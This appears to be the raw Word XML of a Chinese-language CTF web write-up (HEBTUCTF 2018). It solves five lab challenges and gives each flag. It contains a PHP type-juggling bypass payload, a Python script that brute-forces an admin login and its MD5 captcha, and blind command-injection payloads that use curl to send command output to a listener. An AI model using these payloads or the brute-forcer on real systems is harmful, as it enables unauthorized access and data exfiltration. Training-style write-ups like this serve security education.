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HEBTUCTF Web wp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>0x00 签到题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>题目描述：我就是签到题，我来告诉你flag的格式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>考察内容：web前端安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>难易程度：易</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Flag：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>HEBTUCTF{Qi4n_Da0_cH3n9_g0n9}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>解题过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>打开题目看到一个输入框，随便输入一些字符并提交得知要提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HEBTUCTF2018</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">我们提交HEBTUCTF2018，发现不能输入18，这时打开浏览器工具，将输入框的maxlength调整为&gt;12的数值并提交，发现并没有签到成功，这时发现有一个隐藏的输入框，调整其value再次提交拿到flag：HEBTUCTF{Qi4n_Da0_cH3n9_g0n9}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0x01 2048</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>题目描述：小火汁，听说你打游戏超厉害，你玩到20480分我就给你flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>考查内容：js代码调试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>难易程度：易</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Flag：HEBTUCTF{Aaenc0de_1s_FuN}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>解题过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>打开题目看到是一个游戏，查看源码，发现引用了很多js，其中有几个是引用本地js文件，跟进，在main2048.js里面发现有一个function gamewin()，里面有一些奇怪的表情包（有的服务器可能会乱码，重新编为utf-8即可），百度得知为aaencode，这里复制拖入控制台运行弹出假flag，仔细观察控制台得到真flagHEBTUCTF{Aaenc0de_1s_FuN}。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>或者使用网站https://tool.zcmzcm.org/aadecode，进行在线解码即可。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0x02 php是世界上最好的语言</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>题目描述：php是最好的语言，不接受反驳</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>考查内容：php弱类型绕过，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>难易程度：易-&gt;中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Flag：HEBTUCTF{PhP_1s_7he_beSt_L4an9uage}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>解题过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>打开题目拿到源码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?php 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show_source(__FILE__);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@include_once 'flag.php';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//前端攻城狮跑路了，不过PHP是最好的语言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$a = $_GET['a'];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$b = $_GET['b'];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$good = false;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if (sha1($a)===sha1($b)) {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    $good = true;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}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else die('bypass');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if ($good &amp;&amp; isset($_GET['key'])){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    $message = json_decode($_GET['key']);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    if ($message-&gt;key==$key) {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        echo $flag;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    }    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    else die('还差一点就拿到flag了');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}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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>首先是===绕过，这里使用数组绕过，sha1作用于数组会返回NULL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711200"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12700"/>
            <wp:docPr id="1" name="图片 1" descr="2018-10-12 11-23-1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0-12 11-23-15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t="7995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这样传入两个数组就可以构造NULL===NULL从而绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>再看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$message-&gt;key==$key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，这里是==弱类型比较，想到了0==’admin’这种方式，所以构造key={“key”:0}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最终payload：?a[]=&amp;b[]=&amp;key={“key”:0}打到flag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0x03 HEBTU后台管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>题目描述：小x同学找到了HEBTU的后台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>，可是他登录不上去，你可以帮帮他么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>考查内容：爆破</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>难易程度：中-&gt;难</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Flag：HEBTUCTF{Bru7e_f0rC3_233}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>解题过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>打开题目查看源码，发现提示了密码的范围：纯数字4位数，并且看到登录还有验证码？！（还要爆破验证码……）（这里这样写是因为考虑到服务器可能扛不住，所以放缓了大家爆破的速度）看来不能使用bp爆破了。这里使用脚本，附脚本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header={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'Host': '127.0.0.1',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'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',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'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',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'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',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'Accept-Encoding': 'gzip, deflate',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'Referer': 'http://127.0.0.1/baopo.php',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'Cookie': 'Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1537151426,1537158118; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1537158125; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*%E6%B8%B8%E5%AE%A2; PHPSESSID=dsgjpefe58dkqjb7nvm0n5a617',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'Connection': 'keep-alive'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for i in range(9999):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r2=requests.get(url='http://127.0.0.1/baopo.php',headers=header)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r2.encoding='utf-8'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vcode=re.findall('[0-9a-f]{5}',r2.text)[0]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j in range(10000):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hashlib.md5(j).hexdigest()[0:5]==vcode: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url='http://127.0.0.1/baopo.php?username=admin&amp;password={0}&amp;randcode={1}'.format(str(i).zfill(4),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>str(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>)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r1=requests.get(url=url,headers=header)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r1.encoding='utf-8'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"HEBTUCTF" in r1.text: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r1.text,i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 i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脚本需要依据具体环境进行修改，只是一个参考，大致框架已经给出，从而拿到flag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0x04 少年你会ping命令么</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>题目描述：小x同学找到了一个大黑阔的工具，这个工具你会使用么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>考查内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>：盲打rce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>难易程度：难</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Flag：HEBTUCTF{Bl1Nd_RC3_1s_h4rD}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>解题过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>打开题目随便输入一个IP提交，发现没有回显，不论输入什么都是没有回显，确定本题为盲打，可以使用ceye（不需要公网服务器，只要注册一下就好了，流程是类似的）或使用wp中的方法(curl，前提要有一个公网服务器)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>首先尝试命令执行，使用;换行执行，payload如下：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 xml:space="preserve">127.0.0.1;curl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"http://localhost:8888/?a=`whoami`"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http://localhost:8888/?a=`whoami`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监听本机8888得到，发现命令执行成功。于是我们查看目录下文件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02580" cy="975995"/>
            <wp:effectExtent l="0" t="0" r="7620" b="14605"/>
            <wp:docPr id="2" name="图片 2" descr="2018-10-12 15-39-3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0-12 15-39-3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 l="-2349" t="63192" r="-144" b="929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127.0.0.1;curl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"http://localhost:8888/?a=`whoami`"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http://localhost:8888/?a=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>`ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>,发现只返回了一个文件，这里我们使用sed命令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19700" cy="960755"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:docPr id="3" name="图片 3" descr="2018-10-12 15-43-5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10-12 15-43-56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rcRect t="66309" r="976" b="660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127.0.0.1;curl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"http://localhost:8888/?a=`whoami`"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http://localhost:8888/?a=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>ls | sed -n "2p"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发现打到了第二个，我们继续尝试，然后打到了flaaaaag.php，然后cat即可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953135"/>
            <wp:effectExtent l="0" t="0" r="5715" b="18415"/>
            <wp:docPr id="4" name="图片 4" descr="2018-10-12 15-47-4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10-12 15-47-46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rcRect t="62585" b="105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补充：有时限制了请求的长度（尤其是在ceye中），导致我们带出太多数据时会出错，这里可以使用cut 指令,如下图，这样可以一点一点把数据带出来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1319530"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13970"/>
            <wp:docPr id="5" name="图片 5" descr="2018-10-12 15-51-1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10-12 15-51-17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rcRect t="11779" b="510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C333F"/>
    <w:rsid w:val="1CF44138"/>
    <w:rsid w:val="1D7CA914"/>
    <w:rsid w:val="1EB830BA"/>
    <w:rsid w:val="23FBE8C4"/>
    <w:rsid w:val="267D11FE"/>
    <w:rsid w:val="2F5C333F"/>
    <w:rsid w:val="3FF7E548"/>
    <w:rsid w:val="67BEC131"/>
    <w:rsid w:val="6F9FC728"/>
    <w:rsid w:val="73E5FA0D"/>
    <w:rsid w:val="76BF8BED"/>
    <w:rsid w:val="789DC4B2"/>
    <w:rsid w:val="7BF5AAE5"/>
    <w:rsid w:val="7D7DB089"/>
    <w:rsid w:val="98BD67CB"/>
    <w:rsid w:val="AEDFA0E1"/>
    <w:rsid w:val="C43BEE62"/>
    <w:rsid w:val="DFFB11A8"/>
    <w:rsid w:val="EF7D7F79"/>
    <w:rsid w:val="F41BA65F"/>
    <w:rsid w:val="FF3E2CB7"/>
    <w:rsid w:val="FF5FE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2018-10-12T10:36:00Z</dcterms:created>
  <dc:creator>fish</dc:creator>
  <cp:lastModifiedBy>fish</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-12T15:52:03Z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